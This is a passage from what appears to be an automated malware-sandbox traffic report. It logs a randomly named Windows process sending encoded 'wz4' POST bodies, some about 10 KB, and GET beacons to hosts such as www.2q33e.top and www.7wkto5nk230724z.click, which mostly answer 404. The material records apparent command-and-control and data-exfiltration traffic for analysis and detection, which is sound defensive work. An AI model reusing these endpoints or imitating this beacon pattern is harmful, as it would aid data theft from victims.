                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Ascii: wz4=fKR5BiRZA+HGwUp1Vi2+gdMIfZd+a7f6oZyuhMysQR1othf2C3tVgRc1ZP494GxrOB8uKOiUG1odBGfDNp1m4XJPsDPPi7+1eP3JNRgWdAs024zud7nfHI9Hsm0iFwR3tCV9lX9mD+O2+hkbZ2k4pnmdzZlP6Mj5n1kcxTEGAxLPXQZOiem3ojlbTzZrO2104g==
Timestamp: Jan 14, 2025 10:25:55.782677889 CET | Bytes transferred: 289 | Direction: IN
HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:25:55 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 18 | Source IP: 192.168.2.4 | Source Port: 57601 | Destination IP: 38.47.233.52 | Destination Port: 80 | PID: 4944 | Process: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp: Jan 14, 2025 10:25:57.420248985 CET | Bytes transferred: 711 | Direction: OUT
POST /dim8/ HTTP/1.1
                                                                              Host: www.2q33e.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.2q33e.top
                                                                              Referer: http://www.2q33e.top/dim8/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Ascii: wz4=fKR5BiRZA+HGiEZ1QD2+3tMHDpd+DLf2oZuuhNHhQidotBv2F1FVlRc1Wf4C3mxeOBBEKM2UGxAdBGvDMeBh5HJN3TPN8L+1eP3JNR08dA002pDucZPYEI9A620iBwRztCUelWRcD922+j8bZnk7nnmh3Zk+++qFqGhk+VNhHDbCb2UUzvHg6jBoO0QfD1I9jpPjmJdfGKA2+DYLsfWYOlg=
Timestamp: Jan 14, 2025 10:25:58.318330050 CET | Bytes transferred: 289 | Direction: IN
HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:25:58 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 19 | Source IP: 192.168.2.4 | Source Port: 57602 | Destination IP: 38.47.233.52 | Destination Port: 80 | PID: 4944 | Process: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp: Jan 14, 2025 10:25:59.969480991 CET | Bytes transferred: 10793 | Direction: OUT
POST /dim8/ HTTP/1.1
                                                                              Host: www.2q33e.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.2q33e.top
                                                                              Referer: http://www.2q33e.top/dim8/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Data Ascii: wz4= [TRUNCATED]
Timestamp: Jan 14, 2025 10:26:00.889535904 CET | Bytes transferred: 289 | Direction: IN
HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:26:00 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 57603 | Destination IP: 38.47.233.52 | Destination Port: 80 | PID: 4944 | Process: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp: Jan 14, 2025 10:26:02.518615007 CET | Bytes transferred: 436 | Direction: OUT
GET /dim8/?wz4=SI5ZCVgJbtC8ikIAaDbl0c4+a+swA4Oej6uVn92gSwZctgLMHnh4qXUXZe4N7Wh4DCFNfNClZUM8FDTYBsBE5loeshCr6I6FGtX7Gz1ZeQkIvaXZY4DJTLc=&OvV=2njD6f80EDOLQ8 HTTP/1.1
                                                                              Host: www.2q33e.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
Timestamp: Jan 14, 2025 10:26:03.413165092 CET | Bytes transferred: 289 | Direction: IN
HTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Tue, 14 Jan 2025 09:26:03 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 146
                                                                              Connection: close
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 57604 | Destination IP: 104.21.3.193 | Destination Port: 80 | PID: 4944 | Process: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
Timestamp: Jan 14, 2025 10:26:08.452037096 CET | Bytes transferred: 727 | Direction: OUT
POST /yysf/ HTTP/1.1
                                                                              Host: www.7wkto5nk230724z.click
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.7wkto5nk230724z.click
                                                                              Referer: http://www.7wkto5nk230724z.click/yysf/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Ascii: wz4=0+Tl/asN0sgwJuHXg8A8VfjvFqG0s89bLm4HvAm++ETsXnrpi8tGbbCgjct+qvUjHX73WtQ4C7DG52AEks3usjRzzc0AA1wxWioDXyn8GVLvqjqCx1EtC6P99qBHkR+VIvQwC+3KmW0zKcxwTOwG/yJ5HKh6057pO6ERY/oAJHX8u6HQGd9M2rOe5aAJWebGNA==
                                                                              Jan 14, 2025 10:26:08.909774065 CET  922                IN         HTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:26:08 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Pt32mz4Hjf5wEYEo84%2FdHhvMrBqOd9qGOnyw2tkOof0KdwmNOSE8nVKByZycViJhT%2F82LZwvB6SZcNzltYxE6tBD0Icnv1pfWwHcmjNspDZy4qrksAN6UH9zvhU%2BsLUlWyoafdocWILSdJf"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901c953158fa4309-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1683&rtt_var=841&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              22          192.168.2.4  57605        104.21.3.193    80                4944  C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 14, 2025 10:26:11.011548042 CET  747                OUT        POST /yysf/ HTTP/1.1
                                                                              Host: www.7wkto5nk230724z.click
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.7wkto5nk230724z.click
                                                                              Referer: http://www.7wkto5nk230724z.click/yysf/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 30 2b 54 6c 2f 61 73 4e 30 73 67 77 50 4f 58 58 7a 4e 41 38 45 76 6a 6f 63 4b 47 30 35 4d 39 41 4c 6e 45 48 76 42 6a 6c 2b 32 48 73 58 43 76 70 6a 39 74 47 59 62 43 67 70 38 74 78 6b 50 56 68 48 58 32 43 57 74 63 34 43 37 58 47 35 32 77 45 6e 62 4c 70 74 7a 51 56 2b 38 30 65 4f 56 77 78 57 69 6f 44 58 79 44 46 47 56 54 76 71 7a 61 43 77 51 6f 75 42 36 50 2b 36 71 42 48 31 42 2f 63 49 76 51 53 43 38 44 67 6d 54 34 7a 4b 59 39 77 54 66 77 48 32 79 4a 7a 5a 36 67 6b 79 36 57 2f 4d 62 70 72 47 38 63 7a 48 56 37 5a 76 38 4b 4b 58 73 63 62 6b 72 71 74 6b 64 4a 39 62 64 6d 50 57 4f 4b 6e 67 6d 54 63 34 6a 65 31 71 4f 31 65 42 37 37 4d 4e 4f 45 3d
                                                                              Data Ascii: wz4=0+Tl/asN0sgwPOXXzNA8EvjocKG05M9ALnEHvBjl+2HsXCvpj9tGYbCgp8txkPVhHX2CWtc4C7XG52wEnbLptzQV+80eOVwxWioDXyDFGVTvqzaCwQouB6P+6qBH1B/cIvQSC8DgmT4zKY9wTfwH2yJzZ6gky6W/MbprG8czHV7Zv8KKXscbkrqtkdJ9bdmPWOKngmTc4je1qO1eB77MNOE=
                                                                              Jan 14, 2025 10:26:12.081835032 CET  924                IN         HTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:26:11 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhQRVzxcARiCQFR76qX%2FN8cdbofdEwLUmRg7fc8VBQCvK441%2FvI%2FOL79ouJLyUIrDU5HIIGn0YYpAXTkEnMgs2pjpNomBCORkK4g23UaxOE1CIFlSxWB1SNTS%2Fgr7pVmqolT9nxNaJtbbe3A"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901c95414d2ede92-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                                                                              Jan 14, 2025 10:26:12.082305908 CET  924                IN         HTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:26:11 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhQRVzxcARiCQFR76qX%2FN8cdbofdEwLUmRg7fc8VBQCvK441%2FvI%2FOL79ouJLyUIrDU5HIIGn0YYpAXTkEnMgs2pjpNomBCORkK4g23UaxOE1CIFlSxWB1SNTS%2Fgr7pVmqolT9nxNaJtbbe3A"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901c95414d2ede92-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1715&rtt_var=857&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              23          192.168.2.4  57606        104.21.3.193    80                4944  C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 14, 2025 10:26:13.545166969 CET  10829              OUT        POST /yysf/ HTTP/1.1
                                                                              Host: www.7wkto5nk230724z.click
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.7wkto5nk230724z.click
                                                                              Referer: http://www.7wkto5nk230724z.click/yysf/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 30 2b 54 6c 2f 61 73 4e 30 73 67 77 50 4f 58 58 7a 4e 41 38 45 76 6a 6f 63 4b 47 30 35 4d 39 41 4c 6e 45 48 76 42 6a 6c 2b 32 2f 73 58 30 54 70 69 65 46 47 5a 62 43 67 71 38 74 79 6b 50 56 67 48 58 75 5a 57 74 68 48 43 34 76 47 2f 6e 51 45 6d 76 66 70 6b 7a 51 56 68 73 30 66 41 31 77 6b 57 6a 59 50 58 79 7a 46 47 56 54 76 71 77 43 43 6d 31 45 75 4e 61 50 39 39 71 42 44 6b 52 2b 35 49 72 45 6f 43 38 48 61 6e 6e 45 7a 4c 38 52 77 66 4e 49 48 35 79 4a 31 59 36 67 73 79 36 62 68 4d 62 6b 46 47 38 5a 37 48 55 44 5a 75 34 37 53 48 4e 45 76 2f 36 61 6b 35 39 42 59 54 50 79 38 61 4a 50 65 70 45 6e 37 67 67 69 64 75 4d 73 62 5a 71 72 4b 5a 61 69 4c 53 78 4d 6c 4f 36 73 6a 65 7a 6e 35 30 57 48 65 37 50 36 65 30 6b 49 56 6f 49 6f 4c 44 51 79 48 77 32 4c 57 47 38 36 55 65 48 70 48 79 34 63 4f 6f 2b 41 56 74 68 34 6e 41 34 30 56 30 44 32 49 68 43 69 52 36 36 35 45 6e 75 7a 63 61 2f 35 6b 66 43 37 70 31 59 70 4f 36 2b 48 6e 72 78 31 78 4f 56 78 70 33 69 7a 4b 4a 68 57 65 6c 77 38 46 6d 57 6c 38 38 61 [TRUNCATED]
                                                                              Data Ascii: wz4=0+Tl/asN0sgwPOXXzNA8EvjocKG05M9ALnEHvBjl+2/sX0TpieFGZbCgq8tykPVgHXuZWthHC4vG/nQEmvfpkzQVhs0fA1wkWjYPXyzFGVTvqwCCm1EuNaP99qBDkR+5IrEoC8HannEzL8RwfNIH5yJ1Y6gsy6bhMbkFG8Z7HUDZu47SHNEv/6ak59BYTPy8aJPepEn7ggiduMsbZqrKZaiLSxMlO6sjezn50WHe7P6e0kIVoIoLDQyHw2LWG86UeHpHy4cOo+AVth4nA40V0D2IhCiR665Enuzca/5kfC7p1YpO6+Hnrx1xOVxp3izKJhWelw8FmWl88a/kKNLLLRv1thVPhj3ZGa0/EMmV+0XDnQty30/wlHoMJkMqo+XEwO0KPUvSUnzXNUFyzgxLs2oGlFRATbW820wGL6fvNKKhQvAntZuPC3ckOuaz+Y/ZkzGLJHdnknottyDStSp8etRP0lhg+jcStVCdeqUSnYWRKWVpoRXQ8IKbNPG7M9/NJowDR/yJmCSYrzrOrzrwyShCODWS4W0fUWG3Pe2SZdOZctw7VKFLakuwBgz8XwkxY8bMyDRsi/oks8ELqs5sxROhWLaxSOW+euzIxftXZ7ZIV0+j+gQ0Xmx/bB8IoQ3jLe8QdvEvQH/+14vwsVt8yM8XJlz5wXOU6evSfxqZIBrNS1dKLsxVuxuC0N0B4DKixYCM+y+hUyfWJ2HOutOoOgLaR8yjDBBOvofYVnTvXLQYeWagzoPMZZNOko8DjN9STee8PBreHeWunMAdEsAVLDECiDgb86swwFtZ8uG+r+yZYlPXY4gvseH/z0Wn0y5oBmMPkl5XpCC+RzWk2r+ws0hx83vv754M84C5TPZnsDURN05fm1tFzlROPtIWOYSp3+aILasnYh/c4T/QzgofhDJ4h1KAViwo1dl2ZrIpBkRkHnNdxCRLX4iC2pa8l5OJRpME3SDrkuknOZrpLr5bYCPUdI/EG3JrnKPIUMw9bQWBgMvN [TRUNCATED]
                                                                              Jan 14, 2025 10:26:14.005810022 CET  933                IN         HTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:26:13 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FbP2NoBQfclcAsHdBnv16qAEYZDiHZ188yjA%2BJczaFFo9aSzii9rYnhH2qSVZZfPYZSrjsIcgTNLb9oUkIzq%2B3%2BAC0RzvC7koCGhtCvF1t8Z2IYjInbVRQzJXHlSSuJVN%2FH9BJe8oGaz%2BKm%2F"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901c955129674304-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1552&rtt_var=776&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10829&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              24          192.168.2.4  57607        104.21.3.193    80                4944  C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 14, 2025 10:26:16.088562012 CET  448                OUT        GET /yysf/?OvV=2njD6f80EDOLQ8&wz4=587F8uRRvdNyXp392stmA/LSb7Spi8c8LmJfnRupxm2/Wn33qNRES9K4qtAStdZkGkX6B9loQ5/VkD04mezEqEUp6fJ/QFk+OhJrfgesanG1zCyT/BctW7c= HTTP/1.1
                                                                              Host: www.7wkto5nk230724z.click
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:26:16.567145109 CET  940                IN         HTTP/1.1 404 Not Found
                                                                              Date: Tue, 14 Jan 2025 09:26:16 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BzaA1sj8tH4vEN1ikzeHVNTgk3%2BFvNQpBorj0w%2Frdj2W7%2FKHomoVCySaB5gc9KlsJ8ilVVUNucfOwUT0vE7CQcRtnv25WQrLx3rwHQGrKeBkvI3x63jbORSdYv2e%2BAdyeIkMvQJlnEoUCs9E"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901c95612cfd1a30-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2024&rtt_var=1012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=448&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              25          192.168.2.4  57608        3.33.130.190    80                4944  C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 14, 2025 10:26:21.613159895 CET  706                OUT        POST /otgv/ HTTP/1.1
                                                                              Host: www.livingslab.net
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.livingslab.net
                                                                              Referer: http://www.livingslab.net/otgv/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 72 4e 4c 57 76 63 4e 46 5a 30 2f 34 68 31 47 55 31 32 4b 4d 41 34 4a 2f 49 6f 6d 6c 7a 41 32 66 44 30 70 39 4f 6f 59 63 33 51 44 62 33 4e 43 55 53 2f 2f 4f 45 50 41 6b 6c 49 42 7a 30 65 62 63 73 63 2b 2f 62 66 35 63 79 70 38 77 42 59 73 6e 43 2f 64 75 6c 74 69 2f 4a 43 74 51 4a 6e 78 66 31 70 30 57 64 45 6e 42 6a 56 7a 73 6d 50 71 43 4e 48 6d 4d 54 65 46 76 70 31 6e 35 73 34 4f 54 38 56 46 59 73 6a 77 5a 48 4f 31 51 72 32 52 30 4b 65 4e 78 69 42 72 38 76 55 77 65 72 38 79 71 72 58 41 6a 59 4f 4f 37 41 61 2b 43 58 70 42 4f 2b 61 62 58 4b 42 44 46 4e 66 70 72 4b 74 61 62 31 67 3d 3d
                                                                              Data Ascii: wz4=rNLWvcNFZ0/4h1GU12KMA4J/IomlzA2fD0p9OoYc3QDb3NCUS//OEPAklIBz0ebcsc+/bf5cyp8wBYsnC/dulti/JCtQJnxf1p0WdEnBjVzsmPqCNHmMTeFvp1n5s4OT8VFYsjwZHO1Qr2R0KeNxiBr8vUwer8yqrXAjYOO7Aa+CXpBO+abXKBDFNfprKtab1g==
                                                                              Jan 14, 2025 10:26:22.054047108 CET  73                 IN         HTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              26          192.168.2.4  57609        3.33.130.190    80                4944  C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              Timestamp                            Bytes transferred  Direction  Data
                                                                              Jan 14, 2025 10:26:24.153810978 CET  726                OUT        POST /otgv/ HTTP/1.1
                                                                              Host: www.livingslab.net
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.livingslab.net
                                                                              Referer: http://www.livingslab.net/otgv/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
